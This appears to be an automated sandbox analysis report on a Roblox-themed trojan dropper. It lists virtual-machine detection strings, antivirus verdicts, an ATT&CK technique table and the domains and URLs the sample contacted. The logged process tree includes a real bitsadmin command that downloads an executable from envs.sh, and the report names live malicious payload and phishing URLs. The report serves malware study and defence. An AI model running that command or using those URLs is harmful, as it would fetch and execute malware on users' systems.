          Source: Amcache.hve.12.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: Amcache.hve.12.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: BootstrapperV1.19.exe, 00000002.00000002.2124484152.00000226E6B21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: Amcache.hve.12.drBinary or memory string: vmci.sys
          Source: Amcache.hve.12.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
          Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin`
          Source: Amcache.hve.12.drBinary or memory string: \driver\vmci,\driver\pci
          Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.12.drBinary or memory string: VMware20,1
          Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.12.drBinary or memory string: VMware PCI VMCI Bus Device
          Source: Amcache.hve.12.drBinary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.12.drBinary or memory string: VMware Virtual RAM
          Source: Amcache.hve.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: Amcache.hve.12.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\System32\svchost.exeFile created: BITD1EE.tmp.6.drJump to dropped file
          Source: Yara matchFile source: Process Memory Space: BootstrapperV1.19.exe PID: 6516, type: MEMORYSTR
          Source: Yara matchFile source: \Device\ConDrv, type: DROPPED
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeProcess created: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe "C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe" Jump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://envs.sh/wUB.exe C:\Users\user\AppData\Local\Temp\cheat.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeQueries volume information: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.12.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.12.drBinary or memory string: MsMpEng.exe
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Exploitation for Client Execution
          1
          BITS Jobs
          11
          Process Injection
          1
          Masquerading
          OS Credential Dumping1
          Query Registry
          Remote Services1
          Email Collection
          1
          Web Service
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading
          1
          DLL Side-Loading
          1
          Disable or Modify Tools
          LSASS Memory131
          Security Software Discovery
          Remote Desktop Protocol1
          Archive Collected Data
          11
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)51
          Virtualization/Sandbox Evasion
          Security Account Manager1
          Process Discovery
          SMB/Windows Admin SharesData from Network Shared Drive1
          Ingress Tool Transfer
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          BITS Jobs
          NTDS51
          Virtualization/Sandbox Evasion
          Distributed Component Object ModelInput Capture2
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
          Process Injection
          LSA Secrets1
          Application Window Discovery
          SSHKeylogging3
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Obfuscated Files or Information
          Cached Domain Credentials1
          File and Directory Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
          Software Packing
          DCSync23
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1511791 Sample: SecuriteInfo.com.Trojan.Sig... Startdate: 16/09/2024 Architecture: WINDOWS Score: 100 47 pastebin.com 2->47 49 envs.sh 2->49 51 6 other IPs or domains 2->51 63 Multi AV Scanner detection for domain / URL 2->63 65 Antivirus detection for URL or domain 2->65 67 Antivirus / Scanner detection for submitted sample 2->67 71 8 other signatures 2->71 9 SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe 3 4 2->9         started        12 svchost.exe 1 1 2->12         started        signatures3 69 Connects to a pastebin service (likely for C&C) 47->69 process4 dnsIp5 33 C:\Users\user\...\BootstrapperV1.19.exe, PE32+ 9->33 dropped 35 C:\Users\user\AppData\...\Downloader.hta, HTML 9->35 dropped 37 SecuriteInfo.com.T....26259.1562.exe.log, CSV 9->37 dropped 16 BootstrapperV1.19.exe 14 8 9->16         started        21 mshta.exe 1 9->21         started        53 envs.sh 89.163.145.170, 443, 49738, 49740 MYLOC-ASIPBackboneofmyLocmanagedITAGDE Germany 12->53 55 127.0.0.1 unknown unknown 12->55 39 C:\Users\user\AppData\Local\...\BITD1EE.tmp, PE32 12->39 dropped 73 Benign windows process drops PE files 12->73 file6 signatures7 process8 dnsIp9 41 pastebin.com 104.20.4.235, 443, 49737 CLOUDFLARENETUS United States 16->41 43 edge-term4-lhr2.roblox.com 128.116.119.3, 443, 49739 ROBLOX-PRODUCTIONUS United States 16->43 45 2 other IPs or domains 16->45 31 \Device\ConDrv, ISO-8859 16->31 dropped 57 Antivirus detection for dropped file 16->57 59 Multi AV Scanner detection for dropped file 16->59 23 WerFault.exe 19 16 16->23         started        25 conhost.exe 16->25         started        61 Tries to download files via bitsadmin 21->61 27 bitsadmin.exe 1 21->27         started        file10 signatures11 process12 process13 29 conhost.exe 27->29         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe68%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
          SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe57%VirustotalBrowse
          SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe100%AviraTR/Dropper.Gen
          SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe100%AviraTR/Redcap.oczed
          C:\Users\user\AppData\Local\Temp\BITD1EE.tmp100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe75%ReversingLabsWin32.Trojan.Generic
          No Antivirus matches
          SourceDetectionScannerLabelLink
          envs.sh2%VirustotalBrowse
          getsolara.dev11%VirustotalBrowse
          www.nodejs.org0%VirustotalBrowse
          edge-term4-lhr2.roblox.com0%VirustotalBrowse
          pastebin.com0%VirustotalBrowse
          clientsettings.roblox.com0%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          http://upx.sf.net0%URL Reputationsafe
          https://envs.sh/UB.exe0%Avira URL Cloudsafe
          http://www.nodejs.org0%Avira URL Cloudsafe
          https://www.cloudflare.com/learning/access-management/phishing-attack/0%Avira URL Cloudsafe
          https://envs.sh/exe0%Avira URL Cloudsafe
          http://127.0.0.1:64630%Avira URL Cloudsafe
          https://ncs.roblox.com/upload0%Avira URL Cloudsafe
          https://www.nodejs.org0%Avira URL Cloudsafe
          http://127.0.0.1:64631%VirustotalBrowse
          https://g.live.com/odclientsettings/ProdV2.C:0%Avira URL Cloudsafe
          https://envs.sh/J0%Avira URL Cloudsafe
          https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/raw0%Avira URL Cloudsafe
          https://github.com/typeshi12/end/releases/download/re/Bootstrapper.exe0%Avira URL Cloudsafe
          https://ncs.roblox.com/upload0%VirustotalBrowse
          https://www.nodejs.org0%VirustotalBrowse
          https://g.live.com/odclientsettings/Prod.C:0%Avira URL Cloudsafe
          https://g.live.com/odclientsettings/ProdV2.C:0%VirustotalBrowse
          http://www.nodejs.org0%VirustotalBrowse
          https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/raw0%VirustotalBrowse
          https://aka.ms/vs/17/release/vc_redist.x64.exe0%Avira URL Cloudsafe
          https://g.live.com/odclientsettings/ProdV20%Avira URL Cloudsafe
          https://www.cloudflare.com/learning/access-management/phishing-attack/0%VirustotalBrowse
          http://edge-term4-lhr2.roblox.com0%Avira URL Cloudsafe
          https://getsolara.dev/100%Avira URL Cloudphishing
          https://envs.sh/wUB.exe.C:0%Avira URL Cloudsafe
          https://getsolara.dev/12%VirustotalBrowse
          https://g.live.com/odclientsettings/ProdV20%VirustotalBrowse
          https://aka.ms/vs/17/release/vc_redist.x64.exe0%VirustotalBrowse
          https://g.live.com/odclientsettings/Prod.C:0%VirustotalBrowse
          https://envs.sh/-0%Avira URL Cloudsafe
          https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi0%Avira URL Cloudsafe
          https://github.com/typeshi12/end/releases/download/re/Bootstrapper.exe0%VirustotalBrowse
          https://envs.sh/.0%Avira URL Cloudsafe
          https://envs.sh/0%Avira URL Cloudsafe
          https://gist.githubusercontent.com/typeshi12/29ef3a44a19235b08aaf229631c024d8/raw0%Avira URL Cloudsafe
          http://edge-term4-lhr2.roblox.com0%VirustotalBrowse
          https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi0%VirustotalBrowse
          https://envs.sh/wUB.exe0%Avira URL Cloudsafe
          http://127.0.0.1:6463/rpc?v=10%Avira URL Cloudsafe
          https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b60%Avira URL Cloudsafe
          https://envs.sh/2%VirustotalBrowse
          https://envs.sh:443/wUB.exe0%Avira URL Cloudsafe
          https://discord.com0%Avira URL Cloudsafe
          http://127.0.0.1:6463/rpc?v=10%VirustotalBrowse
          https://github.com/typeshi12/end/releases/download/re/Solara.Dir.zip0%Avira URL Cloudsafe
          https://gist.githubusercontent.com/typeshi12/29ef3a44a19235b08aaf229631c024d8/raw0%VirustotalBrowse
          http://crl.ver)0%Avira URL Cloudsafe
          https://getsolara.dev/asset/discord.json100%Avira URL Cloudphishing
          https://envs.sh/.2%VirustotalBrowse
          https://github.com/typeshi12/end/releases/download/re/Solara.Dir.zip0%VirustotalBrowse
          http://james.newtonking.com/projects/json0%Avira URL Cloudsafe
          http://getsolara.dev100%Avira URL Cloudphishing
          https://discord.com;http://127.0.0.1:6463/rpc?v=110%Avira URL Cloudsafe
          https://www.cloudflare.com/5xx-error-landing0%Avira URL Cloudsafe
          https://getsolara.dev/asset/discord.json9%VirustotalBrowse
          https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live0%Avira URL Cloudsafe
          https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c960%Avira URL Cloudsafe
          https://www.cloudflare.com/5xx-error-landing0%VirustotalBrowse
          https://discord.com0%VirustotalBrowse
          https://getsolara.dev100%Avira URL Cloudphishing
          http://james.newtonking.com/projects/json0%VirustotalBrowse
          https://getsolara.dev/api/endpoint.json100%Avira URL Cloudphishing
          http://getsolara.dev11%VirustotalBrowse
          https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live0%VirustotalBrowse
          https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c960%VirustotalBrowse
          http://127.0.0.1:646320%Avira URL Cloudsafe
          https://www.newtonsoft.com/jsonschema0%Avira URL Cloudsafe
          https://github.com/zzzprojects/html-agility-pack/issues/5130%Avira URL Cloudsafe
          https://getsolara.dev/Suspected100%Avira URL Cloudphishing
          https://getsolara.dev12%VirustotalBrowse
          https://www.nuget.org/packages/Newtonsoft.Json.Bson0%Avira URL Cloudsafe
          http://127.0.0.1:646320%VirustotalBrowse
          https://getsolara.dev/X100%Avira URL Cloudphishing
          https://getsolara.dev/api/endpoint.json9%VirustotalBrowse
          https://envs.sh/wUB.exeC:0%Avira URL Cloudsafe
          http://clientsettings.roblox.com0%Avira URL Cloudsafe
          https://pastebin.com/raw/pjseRvyK0%Avira URL Cloudsafe
          http://pastebin.com0%Avira URL Cloudsafe
          https://pastebin.com0%Avira URL Cloudsafe
          https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi0%Avira URL Cloudsafe
          https://clientsettings.roblox.com0%Avira URL Cloudsafe
          https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/rawChttps://pastebin.c0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          envs.sh
          89.163.145.170
          truetrueunknown
          getsolara.dev
          104.21.93.27
          truefalseunknown
          www.nodejs.org
          104.20.23.46
          truefalseunknown
          edge-term4-lhr2.roblox.com
          128.116.119.3
          truefalseunknown
          pastebin.com
          104.20.4.235
          truetrueunknown
          clientsettings.roblox.com
          unknown
          unknowntrueunknown
          NameMaliciousAntivirus DetectionReputation
          https://getsolara.dev/true
          • 12%, Virustotal, Browse
          • Avira URL Cloud: phishing
          unknown
          https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msifalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://envs.sh/wUB.exetrue
          • Avira URL Cloud: safe
          unknown
          https://getsolara.dev/asset/discord.jsontrue
          • 9%, Virustotal, Browse
          • Avira URL Cloud: phishing
          unknown
          https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/livefalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://pastebin.com/raw/pjseRvyKfalse
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://127.0.0.1:6463BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226801B5000.00000004.00000800.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://www.cloudflare.com/learning/access-management/phishing-attack/BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226800F2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226800CD000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.nodejs.orgBootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://envs.sh/UB.exesvchost.exe, 00000006.00000002.3116890459.00000230B32C5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3116890459.00000230B32DA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2503455769.00000230B3318000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://envs.sh/exesvchost.exe, 00000006.00000003.2503455769.00000230B3318000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://ncs.roblox.com/uploadBootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268014B000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268018B000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://www.nodejs.orgBootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://g.live.com/odclientsettings/ProdV2.C:edb.log.6.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://envs.sh/Jsvchost.exe, 00000006.00000002.3116890459.00000230B32C5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.3065181739.00000230B3318000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/rawBootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680001000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://github.com/typeshi12/end/releases/download/re/Bootstrapper.exeBootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226801DC000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://g.live.com/odclientsettings/Prod.C:edb.log.6.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://aka.ms/vs/17/release/vc_redist.x64.exeBootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe.0.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://g.live.com/odclientsettings/ProdV2edb.log.6.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://edge-term4-lhr2.roblox.comBootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://envs.sh/wUB.exe.C:edb.log.6.drfalse
          • Avira URL Cloud: safe
          unknown
          https://envs.sh/-svchost.exe, 00000006.00000002.3116890459.00000230B32C5000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://envs.sh/.svchost.exe, 00000006.00000002.3116890459.00000230B32DA000.00000004.00000020.00020000.00000000.sdmpfalse
          • 2%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://envs.sh/svchost.exe, 00000006.00000002.3116890459.00000230B32C5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2202546957.00000230B3318000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2503455769.00000230B3318000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3117005696.00000230B3318000.00000004.00000020.00020000.00000000.sdmptrue
          • 2%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://gist.githubusercontent.com/typeshi12/29ef3a44a19235b08aaf229631c024d8/rawBootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680001000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://127.0.0.1:6463/rpc?v=1BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226801B5000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680001000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268008B000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000006.00000003.1894883099.00000230B3212000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drfalse
          • Avira URL Cloud: safe
          unknown
          https://envs.sh:443/wUB.exesvchost.exe, 00000006.00000002.3116810997.00000230B3262000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://discord.comBootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680001000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://github.com/typeshi12/end/releases/download/re/Solara.Dir.zipBootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226801DC000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://crl.ver)svchost.exe, 00000006.00000002.3116810997.00000230B3285000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://upx.sf.netAmcache.hve.12.drfalse
          • URL Reputation: safe
          unknown
          http://james.newtonking.com/projects/jsonBootstrapperV1.19.exe.0.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://getsolara.devBootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226800A8000.00000004.00000800.00020000.00000000.sdmptrue
          • 11%, Virustotal, Browse
          • Avira URL Cloud: phishing
          unknown
          https://discord.com;http://127.0.0.1:6463/rpc?v=11BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://www.cloudflare.com/5xx-error-landingBootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226800F2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226800E2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226800C9000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226800CD000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000006.00000003.1894883099.00000230B3212000.00000004.00000800.00020000.00000000.sdmp, edb.log.6.drfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://getsolara.devBootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226800F2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268008B000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268009E000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680001000.00000004.00000800.00020000.00000000.sdmptrue
          • 12%, Virustotal, Browse
          • Avira URL Cloud: phishing
          unknown
          https://getsolara.dev/api/endpoint.jsonBootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680001000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drtrue
          • 9%, Virustotal, Browse
          • Avira URL Cloud: phishing
          unknown
          http://127.0.0.1:64632BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226801B5000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://www.newtonsoft.com/jsonschemaBootstrapperV1.19.exe.0.drfalse
          • Avira URL Cloud: safe
          unknown
